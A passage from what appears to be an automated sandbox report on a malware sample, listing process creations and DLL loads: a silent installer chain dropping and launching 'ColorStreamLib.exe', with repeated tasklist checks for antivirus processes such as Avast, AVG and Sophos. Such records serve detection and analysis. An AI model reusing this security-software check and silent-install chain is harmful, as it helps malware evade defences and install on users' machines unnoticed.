                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe"
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeProcess created: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe "C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exeProcess created: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp "C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp" /SL5="$1044E,7875736,845824,C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess created: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe "C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" /VERYSILENTJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exeProcess created: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp "C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp" /SL5="$20474,7875736,845824,C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" /VERYSILENTJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9 Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: dlnashext.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: wpdshext.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
